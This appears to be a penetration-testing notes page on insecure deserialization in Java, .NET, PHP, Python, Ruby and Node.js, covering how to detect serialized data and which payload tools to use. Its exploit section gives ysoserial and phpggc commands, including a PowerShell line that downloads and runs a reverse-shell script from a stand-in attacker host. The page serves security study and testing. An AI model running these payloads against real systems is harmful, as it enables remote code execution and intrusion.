Deserialization Attacks

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Deserialization

Serialization is the process of converting complex data structures, such as objects and their fields, into a "flatter" format that can be sent and received as a sequential stream of bytes. Serializing data makes it much simpler to write complex data to inter-process memory, a file, or a database and/or send complex data, for example, over a network, between different components of an application, or in an API call

Deserialization is the process of restoring this byte stream to a fully functional replica of the original object, in the exact state as when it was serialized.

Insecure deserialization is when user-controllable data is deserialized by a website. This potentially enables an attacker to manipulate serialized objects in order to pass harmful data into the application code.

During auditing, you should look at all data being passed into the website and try to identify anything that looks like serialized data. Serialized data can be identified relatively easily if you know the format that different languages use.

With Burp Suite Professional, Burp Scanner will automatically flag any HTTP messages that appear to contain serialized objects.

While intercepting request with Burp, we could see, for example, that the cookie parameter is codified and then when we decodify it we can see that the format is serialized.

Java Deserialization

- Java serialization format (Detection)

Serialized Java objects always begin with the same bytes, which are encoded as ac ed in hexadecimal and rO0 in Base64, or AC ED 00 05 in Hex. It could be also detected through Content-type = "application/x-java-serialized-object".

Java-Deserialization BurpSuite plugin (https://github.com/federicodotta/Java-Deserialization-Scanner) will help us identifying this automatically.

If you have source code access, take note of any code that uses the readObject() method, which is used to read and deserialize data from an InputStream.

- XmlSerializer Limitations

XmlSerializer is only able to serialize public properties and fields of an object.

Furthermore, the XmlSerializer class supports a narrow set of objects primarily due to the fact that it cannot serialize abstract classes.

Finally, the type of the object being serialized always has to be known to the XmlSerializer instance at runtime. Attempting to deserialize object types unknown to the XmlSerializer instance will result in a runtime exception.

- Vulnerability Overview

The entry point for this vulnerability is found in the function called LoadProfile, which is implemented in the DotNetNuke.dll module.

We should also look at strings like Serializer, Serialize, deserial, …

To get started, we will need to use the x64 version of dnSpy since the w3wp.exe process that we will be debugging later on is a 64-bit process. In order to decompile our DotNetNuke.dll file, we can simply browse to it using the dnSpy File > Open menu or by dragging it from the File Explorer onto the dnSpy window.

We can now navigate to our target LoadProfile function located in the DotNetNuke.Services.Personalization.PersonalizationController namespace.

- Exploit

If we see a DNNSerialization cookie, we could try to exploit it using ysoserial.exe payload generator:

https://github.com/pwntester/ysoserial.net

If we find a function like JavaScriptSerializer, we can use the following payload along with the ObjectDataProvider gadget:

.\ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -o raw -c "powershell IEX (New-Object System.Net.Web.Client).DownloadString('http://atacker.com/reverse_shell.ps1')" -t

java -jar ysoserial-master.jar CommonsCollections4 "ping 192.168.x.x" | base64 -w 0

.\ysoserial.exe -f JavaScriptSerializer -g CommonsCollections4 -o raw -c "ping 192.168.x.x"

PHP Deserialization

- PHP serialization format (Detection)

$user->name = "carlos";
$user->isLoggedIn = true;

When serialized, this object may look something like this:

O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;}

The native methods for PHP serialization are serialize() and unserialize(). If you have source code access, you should start by looking for unserialize() anywhere in the code and investigating further.

- PHPGGC

A library of PHP unserialize() payloads along with a tool to generate them, targeting various PHP object injection vulnerabilities.

To run it and list gadgets:

php -d phar.readonly=0 phpggc -l

To get info about a chain:

./phpggc -i symfony/rce1

There you can see how to execute it:

./phpggc <gadget-chain> [parameters]

If its a function, to execute a command:

php --define phar.readonly=0 phpggc slim/rce1 -p phar -o /tmp/payload.phar system "wget http://example.com/"

- php-object-injection-payload-generator

A simple PHP script that generates serialized PHP objects.

Python Deserialization

- pyDeser

A tool to generate Python deserialization payloads for various libraries like pickle, pyyaml, etc.

- python-burp-ysoserial

A tool that generates ysoserial-style payloads for Python applications.

Ruby Deserialization

- Ruby Object Injection

Tools and payloads for exploiting Ruby deserialization vulnerabilities are less standardized, but Ruby Marshal load vulnerabilities can be exploited with custom scripts.

Node.js/JavaScript Deserialization

- node-serialize

Vulnerable module to practice exploiting Node.js deserialization vulnerabilities.

General Purpose

- marshalsec

A tool for testing and exploiting Java/JVM deserialization vulnerabilities but also supports other formats like YAML, JSON, REDIS, etc.

- SerializationDumper

A tool for visualizing Java serialized objects, helpful in understanding and crafting deserialization exploits.

PreviousXML External Entity (XXE) Injection NextPadding Oracle Attack

Last updated 8 months ago